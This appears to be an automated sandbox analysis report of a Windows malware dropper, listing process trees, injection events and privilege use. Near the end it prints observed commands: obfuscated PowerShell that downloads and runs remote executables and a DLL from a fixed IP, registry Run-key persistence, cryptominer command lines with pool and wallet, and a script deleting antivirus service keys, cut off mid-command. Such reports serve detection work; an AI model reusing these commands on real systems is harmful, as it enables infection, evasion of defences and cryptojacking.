aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exepid process 2256 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 2256 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2680 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exepid process 2256 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 2680 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WerFault.exeBD9B.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeRestorePrivilege 3816 WerFault.exe Token: SeBackupPrivilege 3816 WerFault.exe Token: SeDebugPrivilege 3880 BD9B.exe Token: SeDebugPrivilege 3816 WerFault.exe Token: SeDebugPrivilege 3336 WerFault.exe Token: SeDebugPrivilege 808 WerFault.exe Token: SeDebugPrivilege 4016 WerFault.exe Token: SeDebugPrivilege 2620 WerFault.exe Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeShutdownPrivilege 2680 Token: SeCreatePagefilePrivilege 2680 Token: SeDebugPrivilege 3708 WerFault.exe Token: SeShutdownPrivilege 2680 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
B472.tmppid process 1572 B472.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
AEE3.exepid process 2620 AEE3.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2680 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exeB472.exeB472.tmpB472.exeB472.tmpC1B3.exeRuntimebroker.exedescription pid process target process PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 1852 wrote to memory of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 2680 wrote to memory of 2620 2680 AEE3.exe PID 2680 wrote to memory of 2620 2680 AEE3.exe PID 2680 wrote to memory of 2620 2680 AEE3.exe PID 2680 wrote to memory of 3524 2680 B472.exe PID 2680 wrote to memory of 3524 2680 B472.exe PID 2680 wrote to memory of 3524 2680 B472.exe PID 3524 wrote to memory of 1116 3524 B472.exe B472.tmp PID 3524 wrote to memory of 1116 3524 B472.exe B472.tmp PID 3524 wrote to memory of 1116 3524 B472.exe B472.tmp PID 1116 wrote to memory of 4044 1116 B472.tmp B472.exe PID 1116 wrote to memory of 4044 1116 B472.tmp B472.exe PID 1116 wrote to memory of 4044 1116 B472.tmp B472.exe PID 4044 wrote to memory of 1572 4044 B472.exe B472.tmp PID 4044 wrote to memory of 1572 4044 B472.exe B472.tmp PID 4044 wrote to memory of 1572 4044 B472.exe B472.tmp PID 2680 wrote to memory of 3880 2680 BD9B.exe PID 2680 wrote to memory of 3880 2680 BD9B.exe PID 2680 wrote to memory of 3880 2680 BD9B.exe PID 2680 wrote to memory of 2928 2680 C1B3.exe PID 2680 wrote to memory of 2928 2680 C1B3.exe PID 2680 wrote to memory of 2928 2680 C1B3.exe PID 1572 wrote to memory of 4020 1572 B472.tmp fsucenter.exe PID 1572 wrote to memory of 4020 1572 B472.tmp fsucenter.exe PID 1572 wrote to memory of 4020 1572 B472.tmp fsucenter.exe PID 2680 wrote to memory of 2624 2680 C628.exe PID 2680 wrote to memory of 2624 2680 C628.exe PID 2680 wrote to memory of 2624 2680 C628.exe PID 2680 wrote to memory of 3376 2680 CF70.exe PID 2680 wrote to memory of 3376 2680 CF70.exe PID 2680 wrote to memory of 3376 2680 CF70.exe PID 2928 wrote to memory of 1112 2928 C1B3.exe Runtimebroker.exe PID 2928 wrote to memory of 1112 2928 C1B3.exe Runtimebroker.exe PID 2928 wrote to memory of 1112 2928 C1B3.exe Runtimebroker.exe PID 2680 wrote to memory of 3612 2680 D25F.exe PID 2680 wrote to memory of 3612 2680 D25F.exe PID 2680 wrote to memory of 3612 2680 D25F.exe PID 2680 wrote to memory of 3872 2680 D399.exe PID 2680 wrote to memory of 3872 2680 D399.exe PID 2680 wrote to memory of 3872 2680 D399.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2580 2680 explorer.exe PID 2680 wrote to memory of 2580 2680 explorer.exe PID 2680 wrote to memory of 2580 2680 explorer.exe PID 2680 wrote to memory of 2264 2680 explorer.exe PID 2680 wrote to memory of 2264 2680 explorer.exe PID 2680 wrote to memory of 2264 2680 explorer.exe PID 2680 wrote to memory of 2264 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 2680 wrote to memory of 2420 2680 explorer.exe PID 1112 wrote to memory of 2616 1112 Runtimebroker.exe powershell.exe PID 1112 wrote to memory of 2616 1112 Runtimebroker.exe powershell.exe PID 1112 wrote to memory of 2616 1112 Runtimebroker.exe powershell.exe PID 2680 wrote to memory of 3180 2680 explorer.exe PID 2680 wrote to memory of 3180 2680 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeC:\Users\Admin\AppData\Local\Temp\AEE3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\B472.exeC:\Users\Admin\AppData\Local\Temp\B472.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp"C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp" /SL5="$B0058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\B472.exe"C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp"C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp" /SL5="$E0052,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe"C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exeC:\Users\Admin\AppData\Local\Temp\BD9B.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C1B3.exeC:\Users\Admin\AppData\Local\Temp\C1B3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8842⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9242⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9042⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 8003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10483⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete 